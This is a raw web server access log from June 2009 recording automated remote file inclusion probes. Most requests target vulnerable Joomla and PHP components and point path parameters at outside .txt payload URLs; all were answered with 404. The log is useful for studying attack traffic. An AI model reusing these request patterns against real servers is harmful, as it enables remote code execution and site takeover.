70.38.54.140 - - [04/Jun/2009:01:17:38 -0400] "GET /logs/access_log.Q108062200%20%20/index.php?redir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:17:38 -0400] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:17:38 -0400] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:17:39 -0400] "GET /logs/access_log.Q109050300/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
217.147.29.190 - - [04/Jun/2009:01:17:42 -0400] "GET /logs/access_log.Q109052600//admin/business_inc/saveserver.php?thisdir=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:01:17:43 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:01:17:43 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.153.212.195 - - [04/Jun/2009:01:17:43 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:17:59 -0400] "GET /logs/access_log.Q109052300//rgboard//include/mail.inc.php?skin_board_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:01:17:59 -0400] "GET /logs/access_log.Q109053100//rgboard//include/mail.inc.php?skin_board_path=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:18:00 -0400] "GET /logs/access_log.Q109053100/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
76.164.212.18 - - [04/Jun/2009:01:18:03 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.38.54.140 - - [04/Jun/2009:01:18:14 -0400] "GET /logs/access_log.Q108112300%20%20/index.php?redir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
76.164.212.18 - - [04/Jun/2009:01:18:23 -0400] "GET /logs/access_log.Q109051100%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:18:24 -0400] "GET /logs/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:18:24 -0400] "GET /logs/access_log.Q109050300/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:18:24 -0400] "GET /administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:01:18:36 -0400] "GET /logs/access_log.Q109053100/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
213.198.73.59 - - [04/Jun/2009:01:18:40 -0400] "GET /logs/access_log.Q109050300%20%20/administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
